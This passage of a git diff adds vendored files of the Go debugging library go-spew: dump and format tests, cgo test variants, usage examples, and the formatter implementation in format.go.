+ addBoolDumpTests()
+ addFloatDumpTests()
+ addComplexDumpTests()
+ addArrayDumpTests()
+ addSliceDumpTests()
+ addStringDumpTests()
+ addInterfaceDumpTests()
+ addMapDumpTests()
+ addStructDumpTests()
+ addUintptrDumpTests()
+ addUnsafePointerDumpTests()
+ addChanDumpTests()
+ addFuncDumpTests()
+ addCircularDumpTests()
+ addPanicDumpTests()
+ addErrorDumpTests()
+ addCgoDumpTests()
+
+ t.Logf("Running %d tests", len(dumpTests))
+ for i, test := range dumpTests {
+ buf := new(bytes.Buffer)
+ spew.Fdump(buf, test.in)
+ s := buf.String()
+ if testFailed(s, test.wants) {
+ t.Errorf("Dump #%d\n got: %s %s", i, s, stringizeWants(test.wants))
+ continue
+ }
+ }
+}
+
+func TestDumpSortedKeys(t *testing.T) {
+ cfg := spew.ConfigState{SortKeys: true}
+ s := cfg.Sdump(map[int]string{1: "1", 3: "3", 2: "2"})
+ expected := "(map[int]string) (len=3) {\n(int) 1: (string) (len=1) " +
+ "\"1\",\n(int) 2: (string) (len=1) \"2\",\n(int) 3: (string) " +
+ "(len=1) \"3\"\n" +
+ "}\n"
+ if s != expected {
+ t.Errorf("Sorted keys mismatch:\n %v %v", s, expected)
+ }
+
+ s = cfg.Sdump(map[stringer]int{"1": 1, "3": 3, "2": 2})
+ expected = "(map[spew_test.stringer]int) (len=3) {\n" +
+ "(spew_test.stringer) (len=1) stringer 1: (int) 1,\n" +
+ "(spew_test.stringer) (len=1) stringer 2: (int) 2,\n" +
+ "(spew_test.stringer) (len=1) stringer 3: (int) 3\n" +
+ "}\n"
+ if s != expected {
+ t.Errorf("Sorted keys mismatch:\n %v %v", s, expected)
+ }
+
+ s = cfg.Sdump(map[pstringer]int{pstringer("1"): 1, pstringer("3"): 3, pstringer("2"): 2})
+ expected = "(map[spew_test.pstringer]int) (len=3) {\n" +
+ "(spew_test.pstringer) (len=1) stringer 1: (int) 1,\n" +
+ "(spew_test.pstringer) (len=1) stringer 2: (int) 2,\n" +
+ "(spew_test.pstringer) (len=1) stringer 3: (int) 3\n" +
+ "}\n"
+ if spew.UnsafeDisabled {
+ expected = "(map[spew_test.pstringer]int) (len=3) {\n" +
+ "(spew_test.pstringer) (len=1) \"1\": (int) 1,\n" +
+ "(spew_test.pstringer) (len=1) \"2\": (int) 2,\n" +
+ "(spew_test.pstringer) (len=1) \"3\": (int) 3\n" +
+ "}\n"
+ }
+ if s != expected {
+ t.Errorf("Sorted keys mismatch:\n %v %v", s, expected)
+ }
+
+ s = cfg.Sdump(map[customError]int{customError(1): 1, customError(3): 3, customError(2): 2})
+ expected = "(map[spew_test.customError]int) (len=3) {\n" +
+ "(spew_test.customError) error: 1: (int) 1,\n" +
+ "(spew_test.customError) error: 2: (int) 2,\n" +
+ "(spew_test.customError) error: 3: (int) 3\n" +
+ "}\n"
+ if s != expected {
+ t.Errorf("Sorted keys mismatch:\n %v %v", s, expected)
+ }
+
+}
diff --git a/vendor/github.com/davecgh/go-spew/spew/dumpcgo_test.go b/vendor/github.com/davecgh/go-spew/spew/dumpcgo_test.go
new file mode 100644
index 0000000000..6ab180809a
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/spew/dumpcgo_test.go
@@ -0,0 +1,99 @@
+// Copyright (c) 2013-2016 Dave Collins
+//
+// Permission to use, copy, modify, and distribute this software for any
+// purpose with or without fee is hereby granted, provided that the above
+// copyright notice and this permission notice appear in all copies.
+//
+// THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+// WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+// MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+// ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+// WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+// ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+// OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+
+// NOTE: Due to the following build constraints, this file will only be compiled
+// when both cgo is supported and "-tags testcgo" is added to the go test
+// command line. This means the cgo tests are only added (and hence run) when
+// specifially requested. This configuration is used because spew itself
+// does not require cgo to run even though it does handle certain cgo types
+// specially. Rather than forcing all clients to require cgo and an external
+// C compiler just to run the tests, this scheme makes them optional.
+// +build cgo,testcgo
+
+package spew_test
+
+import (
+ "fmt"
+
+ "github.com/davecgh/go-spew/spew/testdata"
+)
+
+func addCgoDumpTests() {
+ // C char pointer.
+ v := testdata.GetCgoCharPointer()
+ nv := testdata.GetCgoNullCharPointer()
+ pv := &v
+ vcAddr := fmt.Sprintf("%p", v)
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "*testdata._Ctype_char"
+ vs := "116"
+ addDumpTest(v, "("+vt+")("+vcAddr+")("+vs+")\n")
+ addDumpTest(pv, "(*"+vt+")("+vAddr+"->"+vcAddr+")("+vs+")\n")
+ addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+"->"+vcAddr+")("+vs+")\n")
+ addDumpTest(nv, "("+vt+")()\n")
+
+ // C char array.
+ v2, v2l, v2c := testdata.GetCgoCharArray()
+ v2Len := fmt.Sprintf("%d", v2l)
+ v2Cap := fmt.Sprintf("%d", v2c)
+ v2t := "[6]testdata._Ctype_char"
+ v2s := "(len=" + v2Len + " cap=" + v2Cap + ") " +
+ "{\n 00000000 74 65 73 74 32 00 " +
+ " |test2.|\n}"
+ addDumpTest(v2, "("+v2t+") "+v2s+"\n")
+
+ // C unsigned char array.
+ v3, v3l, v3c := testdata.GetCgoUnsignedCharArray()
+ v3Len := fmt.Sprintf("%d", v3l)
+ v3Cap := fmt.Sprintf("%d", v3c)
+ v3t := "[6]testdata._Ctype_unsignedchar"
+ v3t2 := "[6]testdata._Ctype_uchar"
+ v3s := "(len=" + v3Len + " cap=" + v3Cap + ") " +
+ "{\n 00000000 74 65 73 74 33 00 " +
+ " |test3.|\n}"
+ addDumpTest(v3, "("+v3t+") "+v3s+"\n", "("+v3t2+") "+v3s+"\n")
+
+ // C signed char array.
+ v4, v4l, v4c := testdata.GetCgoSignedCharArray()
+ v4Len := fmt.Sprintf("%d", v4l)
+ v4Cap := fmt.Sprintf("%d", v4c)
+ v4t := "[6]testdata._Ctype_schar"
+ v4t2 := "testdata._Ctype_schar"
+ v4s := "(len=" + v4Len + " cap=" + v4Cap + ") " +
+ "{\n (" + v4t2 + ") 116,\n (" + v4t2 + ") 101,\n (" + v4t2 +
+ ") 115,\n (" + v4t2 + ") 116,\n (" + v4t2 + ") 52,\n (" + v4t2 +
+ ") 0\n}"
+ addDumpTest(v4, "("+v4t+") "+v4s+"\n")
+
+ // C uint8_t array.
+ v5, v5l, v5c := testdata.GetCgoUint8tArray()
+ v5Len := fmt.Sprintf("%d", v5l)
+ v5Cap := fmt.Sprintf("%d", v5c)
+ v5t := "[6]testdata._Ctype_uint8_t"
+ v5s := "(len=" + v5Len + " cap=" + v5Cap + ") " +
+ "{\n 00000000 74 65 73 74 35 00 " +
+ " |test5.|\n}"
+ addDumpTest(v5, "("+v5t+") "+v5s+"\n")
+
+ // C typedefed unsigned char array.
+ v6, v6l, v6c := testdata.GetCgoTypdefedUnsignedCharArray()
+ v6Len := fmt.Sprintf("%d", v6l)
+ v6Cap := fmt.Sprintf("%d", v6c)
+ v6t := "[6]testdata._Ctype_custom_uchar_t"
+ v6s := "(len=" + v6Len + " cap=" + v6Cap + ") " +
+ "{\n 00000000 74 65 73 74 36 00 " +
+ " |test6.|\n}"
+ addDumpTest(v6, "("+v6t+") "+v6s+"\n")
+}
diff --git a/vendor/github.com/davecgh/go-spew/spew/dumpnocgo_test.go b/vendor/github.com/davecgh/go-spew/spew/dumpnocgo_test.go
new file mode 100644
index 0000000000..52a0971fb3
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/spew/dumpnocgo_test.go
@@ -0,0 +1,26 @@
+// Copyright (c) 2013 Dave Collins
+//
+// Permission to use, copy, modify, and distribute this software for any
+// purpose with or without fee is hereby granted, provided that the above
+// copyright notice and this permission notice appear in all copies.
+//
+// THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+// WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+// MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+// ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+// WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+// ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+// OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+
+// NOTE: Due to the following build constraints, this file will only be compiled
+// when either cgo is not supported or "-tags testcgo" is not added to the go
+// test command line. This file intentionally does not setup any cgo tests in
+// this scenario.
+// +build !cgo !testcgo
+
+package spew_test
+
+func addCgoDumpTests() {
+ // Don't add any tests for cgo since this file is only compiled when
+ // there should not be any cgo tests.
+}
diff --git a/vendor/github.com/davecgh/go-spew/spew/example_test.go b/vendor/github.com/davecgh/go-spew/spew/example_test.go
new file mode 100644
index 0000000000..c6ec8c6d59
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/spew/example_test.go
@@ -0,0 +1,226 @@
+/*
+ * Copyright (c) 2013-2016 Dave Collins
+ *
+ * Permission to use, copy, modify, and distribute this software for any
+ * purpose with or without fee is hereby granted, provided that the above
+ * copyright notice and this permission notice appear in all copies.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+ * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+ * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+ * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+ * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+ * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+ * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+ */
+
+package spew_test
+
+import (
+ "fmt"
+
+ "github.com/davecgh/go-spew/spew"
+)
+
+type Flag int
+
+const (
+ flagOne Flag = iota
+ flagTwo
+)
+
+var flagStrings = map[Flag]string{
+ flagOne: "flagOne",
+ flagTwo: "flagTwo",
+}
+
+func (f Flag) String() string {
+ if s, ok := flagStrings[f]; ok {
+ return s
+ }
+ return fmt.Sprintf("Unknown flag (%d)", int(f))
+}
+
+type Bar struct {
+ data uintptr
+}
+
+type Foo struct {
+ unexportedField Bar
+ ExportedField map[interface{}]interface{}
+}
+
+// This example demonstrates how to use Dump to dump variables to stdout.
+func ExampleDump() {
+ // The following package level declarations are assumed for this example:
+ /*
+ type Flag int
+
+ const (
+ flagOne Flag = iota
+ flagTwo
+ )
+
+ var flagStrings = map[Flag]string{
+ flagOne: "flagOne",
+ flagTwo: "flagTwo",
+ }
+
+ func (f Flag) String() string {
+ if s, ok := flagStrings[f]; ok {
+ return s
+ }
+ return fmt.Sprintf("Unknown flag (%d)", int(f))
+ }
+
+ type Bar struct {
+ data uintptr
+ }
+
+ type Foo struct {
+ unexportedField Bar
+ ExportedField map[interface{}]interface{}
+ }
+ */
+
+ // Setup some sample data structures for the example.
+ bar := Bar{uintptr(0)}
+ s1 := Foo{bar, map[interface{}]interface{}{"one": true}}
+ f := Flag(5)
+ b := []byte{
+ 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18,
+ 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, 0x20,
+ 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28,
+ 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f, 0x30,
+ 0x31, 0x32,
+ }
+
+ // Dump!
+ spew.Dump(s1, f, b)
+
+ // Output:
+ // (spew_test.Foo) {
+ // unexportedField: (spew_test.Bar) {
+ // data: (uintptr)
+ // },
+ // ExportedField: (map[interface {}]interface {}) (len=1) {
+ // (string) (len=3) "one": (bool) true
+ // }
+ // }
+ // (spew_test.Flag) Unknown flag (5)
+ // ([]uint8) (len=34 cap=34) {
+ // 00000000 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 |............... |
+ // 00000010 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 |!"#$%&'()*+,-./0|
+ // 00000020 31 32 |12|
+ // }
+ //
+}
+
+// This example demonstrates how to use Printf to display a variable with a
+// format string and inline formatting.
+func ExamplePrintf() {
+ // Create a double pointer to a uint 8.
+ ui8 := uint8(5)
+ pui8 := &ui8
+ ppui8 := &pui8
+
+ // Create a circular data type.
+ type circular struct {
+ ui8 uint8
+ c *circular
+ }
+ c := circular{ui8: 1}
+ c.c = &c
+
+ // Print!
+ spew.Printf("ppui8: %v\n", ppui8)
+ spew.Printf("circular: %v\n", c)
+
+ // Output:
+ // ppui8: <**>5
+ // circular: {1 <*>{1 <*>}}
+}
+
+// This example demonstrates how to use a ConfigState.
+func ExampleConfigState() {
+ // Modify the indent level of the ConfigState only. The global
+ // configuration is not modified.
+ scs := spew.ConfigState{Indent: "\t"}
+
+ // Output using the ConfigState instance.
+ v := map[string]int{"one": 1}
+ scs.Printf("v: %v\n", v)
+ scs.Dump(v)
+
+ // Output:
+ // v: map[one:1]
+ // (map[string]int) (len=1) {
+ // (string) (len=3) "one": (int) 1
+ // }
+}
+
+// This example demonstrates how to use ConfigState.Dump to dump variables to
+// stdout
+func ExampleConfigState_Dump() {
+ // See the top-level Dump example for details on the types used in this
+ // example.
+
+ // Create two ConfigState instances with different indentation.
+ scs := spew.ConfigState{Indent: "\t"}
+ scs2 := spew.ConfigState{Indent: " "}
+
+ // Setup some sample data structures for the example.
+ bar := Bar{uintptr(0)}
+ s1 := Foo{bar, map[interface{}]interface{}{"one": true}}
+
+ // Dump using the ConfigState instances.
+ scs.Dump(s1)
+ scs2.Dump(s1)
+
+ // Output:
+ // (spew_test.Foo) {
+ // unexportedField: (spew_test.Bar) {
+ // data: (uintptr)
+ // },
+ // ExportedField: (map[interface {}]interface {}) (len=1) {
+ // (string) (len=3) "one": (bool) true
+ // }
+ // }
+ // (spew_test.Foo) {
+ // unexportedField: (spew_test.Bar) {
+ // data: (uintptr)
+ // },
+ // ExportedField: (map[interface {}]interface {}) (len=1) {
+ // (string) (len=3) "one": (bool) true
+ // }
+ // }
+ //
+}
+
+// This example demonstrates how to use ConfigState.Printf to display a variable
+// with a format string and inline formatting.
+func ExampleConfigState_Printf() {
+ // See the top-level Dump example for details on the types used in this
+ // example.
+
+ // Create two ConfigState instances and modify the method handling of the
+ // first ConfigState only.
+ scs := spew.NewDefaultConfig()
+ scs2 := spew.NewDefaultConfig()
+ scs.DisableMethods = true
+
+ // Alternatively
+ // scs := spew.ConfigState{Indent: " ", DisableMethods: true}
+ // scs2 := spew.ConfigState{Indent: " "}
+
+ // This is of type Flag which implements a Stringer and has raw value 1.
+ f := flagTwo
+
+ // Dump using the ConfigState instances.
+ scs.Printf("f: %v\n", f)
+ scs2.Printf("f: %v\n", f)
+
+ // Output:
+ // f: 1
+ // f: flagTwo
+}
diff --git a/vendor/github.com/davecgh/go-spew/spew/format.go b/vendor/github.com/davecgh/go-spew/spew/format.go
new file mode 100644
index 0000000000..c49875bacb
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/spew/format.go
@@ -0,0 +1,419 @@
+/*
+ * Copyright (c) 2013-2016 Dave Collins
+ *
+ * Permission to use, copy, modify, and distribute this software for any
+ * purpose with or without fee is hereby granted, provided that the above
+ * copyright notice and this permission notice appear in all copies.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+ * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+ * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+ * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+ * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+ * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+ * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+ */
+
+package spew
+
+import (
+ "bytes"
+ "fmt"
+ "reflect"
+ "strconv"
+ "strings"
+)
+
+// supportedFlags is a list of all the character flags supported by fmt package.
+const supportedFlags = "0-+# "
+
+// formatState implements the fmt.Formatter interface and contains information
+// about the state of a formatting operation. The NewFormatter function can
+// be used to get a new Formatter which can be used directly as arguments
+// in standard fmt package printing calls.
+type formatState struct {
+ value interface{}
+ fs fmt.State
+ depth int
+ pointers map[uintptr]int
+ ignoreNextType bool
+ cs *ConfigState
+}
+
+// buildDefaultFormat recreates the original format string without precision
+// and width information to pass in to fmt.Sprintf in the case of an
+// unrecognized type. Unless new types are added to the language, this
+// function won't ever be called.
+func (f *formatState) buildDefaultFormat() (format string) {
+ buf := bytes.NewBuffer(percentBytes)
+
+ for _, flag := range supportedFlags {
+ if f.fs.Flag(int(flag)) {
+ buf.WriteRune(flag)
+ }
+ }
+
+ buf.WriteRune('v')
+
+ format = buf.String()
+ return format
+}
+
+// constructOrigFormat recreates the original format string including precision
+// and width information to pass along to the standard fmt package. This allows
+// automatic deferral of all format strings this package doesn't support.
+func (f *formatState) constructOrigFormat(verb rune) (format string) {
+ buf := bytes.NewBuffer(percentBytes)
+
+ for _, flag := range supportedFlags {
+ if f.fs.Flag(int(flag)) {
+ buf.WriteRune(flag)
+ }
+ }
+
+ if width, ok := f.fs.Width(); ok {
+ buf.WriteString(strconv.Itoa(width))
+ }
+
+ if precision, ok := f.fs.Precision(); ok {
+ buf.Write(precisionBytes)
+ buf.WriteString(strconv.Itoa(precision))
+ }
+
+ buf.WriteRune(verb)
+
+ format = buf.String()
+ return format
+}
+
+// unpackValue returns values inside of non-nil interfaces when possible and
+// ensures that types for values which have been unpacked from an interface
+// are displayed when the show types flag is also set.
+// This is useful for data types like structs, arrays, slices, and maps which
+// can contain varying types packed inside an interface.
+func (f *formatState) unpackValue(v reflect.Value) reflect.Value {
+ if v.Kind() == reflect.Interface {
+ f.ignoreNextType = false
+ if !v.IsNil() {
+ v = v.Elem()
+ }
+ }
+ return v
+}
+
+// formatPtr handles formatting of pointers by indirecting them as necessary.
+func (f *formatState) formatPtr(v reflect.Value) {
+ // Display nil if top level pointer is nil.
+ showTypes := f.fs.Flag('#')
+ if v.IsNil() && (!showTypes || f.ignoreNextType) {
+ f.fs.Write(nilAngleBytes)
+ return
+ }
+
+ // Remove pointers at or below the current depth from map used to detect
+ // circular refs.
+ for k, depth := range f.pointers {
+ if depth >= f.depth {
+ delete(f.pointers, k)
+ }
+ }
+
+ // Keep list of all dereferenced pointers to possibly show later.
+ pointerChain := make([]uintptr, 0)
+
+ // Figure out how many levels of indirection there are by derferencing
+ // pointers and unpacking interfaces down the chain while detecting circular
+ // references.
+ nilFound := false
+ cycleFound := false
+ indirects := 0
+ ve := v
+ for ve.Kind() == reflect.Ptr {
+ if ve.IsNil() {
+ nilFound = true
+ break
+ }
+ indirects++
+ addr := ve.Pointer()
+ pointerChain = append(pointerChain, addr)
+ if pd, ok := f.pointers[addr]; ok && pd < f.depth {
+ cycleFound = true
+ indirects--
+ break
+ }
+ f.pointers[addr] = f.depth
+
+ ve = ve.Elem()
+ if ve.Kind() == reflect.Interface {
+ if ve.IsNil() {
+ nilFound = true
+ break
+ }
+ ve = ve.Elem()
+ }
+ }
+
+ // Display type or indirection level depending on flags.
+ if showTypes && !f.ignoreNextType {
+ f.fs.Write(openParenBytes)
+ f.fs.Write(bytes.Repeat(asteriskBytes, indirects))
+ f.fs.Write([]byte(ve.Type().String()))
+ f.fs.Write(closeParenBytes)
+ } else {
+ if nilFound || cycleFound {
+ indirects += strings.Count(ve.Type().String(), "*")
+ }
+ f.fs.Write(openAngleBytes)
+ f.fs.Write([]byte(strings.Repeat("*", indirects)))
+ f.fs.Write(closeAngleBytes)
+ }
+
+ // Display pointer information depending on flags.
+ if f.fs.Flag('+') && (len(pointerChain) > 0) {
+ f.fs.Write(openParenBytes)
+ for i, addr := range pointerChain {
+ if i > 0 {
+ f.fs.Write(pointerChainBytes)
+ }
+ printHexPtr(f.fs, addr)
+ }
+ f.fs.Write(closeParenBytes)
+ }
+
+ // Display dereferenced value.
+ switch {
+ case nilFound == true:
+ f.fs.Write(nilAngleBytes)
+
+ case cycleFound == true:
+ f.fs.Write(circularShortBytes)
+
+ default:
+ f.ignoreNextType = true
+ f.format(ve)
+ }
+}
+
+// format is the main workhorse for providing the Formatter interface. It
+// uses the passed reflect value to figure out what kind of object we are
+// dealing with and formats it appropriately. It is a recursive function,
+// however circular data structures are detected and handled properly.
+func (f *formatState) format(v reflect.Value) {
+ // Handle invalid reflect values immediately.
+ kind := v.Kind()
+ if kind == reflect.Invalid {
+ f.fs.Write(invalidAngleBytes)
+ return
+ }
+
+ // Handle pointers specially.
+ if kind == reflect.Ptr {
+ f.formatPtr(v)
+ return
+ }
+
+ // Print type information unless already handled elsewhere.
+ if !f.ignoreNextType && f.fs.Flag('#') {
+ f.fs.Write(openParenBytes)
+ f.fs.Write([]byte(v.Type().String()))
+ f.fs.Write(closeParenBytes)
+ }
+ f.ignoreNextType = false
+
+ // Call Stringer/error interfaces if they exist and the handle methods
+ // flag is enabled.
+ if !f.cs.DisableMethods {
+ if (kind != reflect.Invalid) && (kind != reflect.Interface) {
+ if handled := handleMethods(f.cs, f.fs, v); handled {
+ return
+ }
+ }
+ }
+
+ switch kind {
+ case reflect.Invalid:
+ // Do nothing. We should never get here since invalid has already
+ // been handled above.
+
+ case reflect.Bool:
+ printBool(f.fs, v.Bool())
+
+ case reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64, reflect.Int:
+ printInt(f.fs, v.Int(), 10)
+
+ case reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uint:
+ printUint(f.fs, v.Uint(), 10)
+
+ case reflect.Float32:
+ printFloat(f.fs, v.Float(), 32)
+
+ case reflect.Float64:
+ printFloat(f.fs, v.Float(), 64)
+
+ case reflect.Complex64:
+ printComplex(f.fs, v.Complex(), 32)
+
+ case reflect.Complex128:
+ printComplex(f.fs, v.Complex(), 64)
+
+ case reflect.Slice:
+ if v.IsNil() {
+ f.fs.Write(nilAngleBytes)
+ break
+ }
+ fallthrough
+
+ case reflect.Array:
+ f.fs.Write(openBracketBytes)
+ f.depth++
+ if (f.cs.MaxDepth != 0) && (f.depth > f.cs.MaxDepth) {
+ f.fs.Write(maxShortBytes)
+ } else {
+ numEntries := v.Len()
+ for i := 0; i < numEntries; i++ {
+ if i > 0 {
+ f.fs.Write(spaceBytes)
+ }
+ f.ignoreNextType = true
+ f.format(f.unpackValue(v.Index(i)))
+ }
+ }
+ f.depth--
+ f.fs.Write(closeBracketBytes)
+
+ case reflect.String:
+ f.fs.Write([]byte(v.String()))
+
+ case reflect.Interface:
+ // The only time we should get here is for nil interfaces due to
+ // unpackValue calls.
+ if v.IsNil() {
+ f.fs.Write(nilAngleBytes)
+ }
+
+ case reflect.Ptr:
+ // Do nothing. We should never get here since pointers have already
+ // been handled above.
+
+ case reflect.Map:
+ // nil maps should be indicated as different than empty maps
+ if v.IsNil() {
+ f.fs.Write(nilAngleBytes)
+ break
+ }
+
+ f.fs.Write(openMapBytes)
+ f.depth++
+ if (f.cs.MaxDepth != 0) && (f.depth > f.cs.MaxDepth) {
+ f.fs.Write(maxShortBytes)
+ } else {
+ keys := v.MapKeys()
+ if f.cs.SortKeys {
+ sortValues(keys, f.cs)
+ }
+ for i, key := range keys {
+ if i > 0 {
+ f.fs.Write(spaceBytes)
+ }
+ f.ignoreNextType = true
+ f.format(f.unpackValue(key))
+ f.fs.Write(colonBytes)
+ f.ignoreNextType = true
+ f.format(f.unpackValue(v.MapIndex(key)))
+ }
+ }
+ f.depth--
+ f.fs.Write(closeMapBytes)
+
+ case reflect.Struct:
+ numFields := v.NumField()
+ f.fs.Write(openBraceBytes)
+ f.depth++
+ if (f.cs.MaxDepth != 0) && (f.depth > f.cs.MaxDepth) {
+ f.fs.Write(maxShortBytes)
+ } else {
+ vt := v.Type()
+ for i := 0; i < numFields; i++ {
+ if i > 0 {
+ f.fs.Write(spaceBytes)
+ }
+ vtf := vt.Field(i)
+ if f.fs.Flag('+') || f.fs.Flag('#') {
+ f.fs.Write([]byte(vtf.Name))
+ f.fs.Write(colonBytes)
+ }
+ f.format(f.unpackValue(v.Field(i)))
+ }
+ }
+ f.depth--
+ f.fs.Write(closeBraceBytes)
+
+ case reflect.Uintptr:
+ printHexPtr(f.fs, uintptr(v.Uint()))
+
+ case reflect.UnsafePointer, reflect.Chan, reflect.Func:
+ printHexPtr(f.fs, v.Pointer())
+
+ // There were not any other types at the time this code was written, but
+ // fall back to letting the default fmt package handle it if any get added.
+ default:
+ format := f.buildDefaultFormat()
+ if v.CanInterface() {
+ fmt.Fprintf(f.fs, format, v.Interface())
+ } else {
+ fmt.Fprintf(f.fs, format, v.String())
+ }
+ }
+}
+
+// Format satisfies the fmt.Formatter interface. See NewFormatter for usage
+// details.
+func (f *formatState) Format(fs fmt.State, verb rune) {
+ f.fs = fs
+
+ // Use standard formatting for verbs that are not v.
+ if verb != 'v' {
+ format := f.constructOrigFormat(verb)
+ fmt.Fprintf(fs, format, f.value)
+ return
+ }
+
+ if f.value == nil {
+ if fs.Flag('#') {
+ fs.Write(interfaceBytes)
+ }
+ fs.Write(nilAngleBytes)
+ return
+ }
+
+ f.format(reflect.ValueOf(f.value))
+}
+
+// newFormatter is a helper function to consolidate the logic from the various
+// public methods which take varying config states.
+func newFormatter(cs *ConfigState, v interface{}) fmt.Formatter {
+ fs := &formatState{value: v, cs: cs}
+ fs.pointers = make(map[uintptr]int)
+ return fs
+}
+
+/*
+NewFormatter returns a custom formatter that satisfies the fmt.Formatter
+interface. As a result, it integrates cleanly with standard fmt package
+printing functions. The formatter is useful for inline printing of smaller data
+types similar to the standard %v format specifier.
+
+The custom formatter only responds to the %v (most compact), %+v (adds pointer
+addresses), %#v (adds types), or %#+v (adds types and pointer addresses) verb
+combinations. Any other verbs such as %x and %q will be sent to the the
+standard fmt package for formatting. In addition, the custom formatter ignores
+the width and precision arguments (however they will still work on the format
+specifiers not handled by the custom formatter).
+
+Typically this function shouldn't be called directly. It is much easier to make
+use of the custom formatter by calling one of the convenience functions such as
+Printf, Println, or Fprintf.
+*/
+func NewFormatter(v interface{}) fmt.Formatter {
+ return newFormatter(&Config, v)
+}
diff --git a/vendor/github.com/davecgh/go-spew/spew/format_test.go b/vendor/github.com/davecgh/go-spew/spew/format_test.go
new file mode 100644
index 0000000000..f9b93abe86
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/spew/format_test.go
@@ -0,0 +1,1558 @@
+/*
+ * Copyright (c) 2013-2016 Dave Collins
+ *
+ * Permission to use, copy, modify, and distribute this software for any
+ * purpose with or without fee is hereby granted, provided that the above
+ * copyright notice and this permission notice appear in all copies.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+ * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+ * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+ * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+ * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+ * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+ * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+ */
+
+/*
+Test Summary:
+NOTE: For each test, a nil pointer, a single pointer and double pointer to the
+base test element are also tested to ensure proper indirection across all types.
+
+- Max int8, int16, int32, int64, int
+- Max uint8, uint16, uint32, uint64, uint
+- Boolean true and false
+- Standard complex64 and complex128
+- Array containing standard ints
+- Array containing type with custom formatter on pointer receiver only
+- Array containing interfaces
+- Slice containing standard float32 values
+- Slice containing type with custom formatter on pointer receiver only
+- Slice containing interfaces
+- Nil slice
+- Standard string
+- Nil interface
+- Sub-interface
+- Map with string keys and int vals
+- Map with custom formatter type on pointer receiver only keys and vals
+- Map with interface keys and values
+- Map with nil interface value
+- Struct with primitives
+- Struct that contains another struct
+- Struct that contains custom type with Stringer pointer interface via both
+ exported and unexported fields
+- Struct that contains embedded struct and field to same struct
+- Uintptr to 0 (null pointer)
+- Uintptr address of real variable
+- Unsafe.Pointer to 0 (null pointer)
+- Unsafe.Pointer to address of real variable
+- Nil channel
+- Standard int channel
+- Function with no params and no returns
+- Function with param and no returns
+- Function with multiple params and multiple returns
+- Struct that is circular through self referencing
+- Structs that are circular through cross referencing
+- Structs that are indirectly circular
+- Type that panics in its Stringer interface
+- Type that has a custom Error interface
+- %x passthrough with uint
+- %#x passthrough with uint
+- %f passthrough with precision
